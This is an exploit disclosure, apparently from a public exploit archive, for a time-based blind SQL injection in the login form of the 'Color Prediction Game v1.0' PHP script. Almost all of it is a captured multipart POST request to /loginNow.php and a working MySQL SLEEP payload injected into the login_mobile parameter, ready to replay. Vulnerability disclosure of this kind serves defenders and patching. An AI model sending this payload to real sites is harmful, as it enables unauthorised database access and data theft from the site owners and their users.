# Exploit Title: Color Prediction Game v1.0 - SQL Injection # Date: 2023-08-12 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script # Tested on: Kali Linux & MacOS # CVE: N/A ### Request ### POST /loginNow.php HTTP/1.1 Host: localhost Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------395879129218961020344050490865 Content-Length: 434 Origin: http://localhost Referer: http://localhost/login.php Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close -----------------------------395879129218961020344050490865 Content-Disposition: form-data; name="login_mobile" 4334343433 -----------------------------395879129218961020344050490865 Content-Disposition: form-data; name="login_password" 123456 -----------------------------395879129218961020344050490865 Content-Disposition: form-data; name="action" login -----------------------------395879129218961020344050490865-- ### Parameter & Payloads ### Parameter: MULTIPART login_mobile ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------395879129218961020344050490865 Content-Disposition: form-data; name="login_mobile" 4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW -----------------------------395879129218961020344050490865 Content-Disposition: form-data; name="login_password" 123456 -----------------------------395879129218961020344050490865 Content-Disposition: form-data; name="action" login -----------------------------395879129218961020344050490865--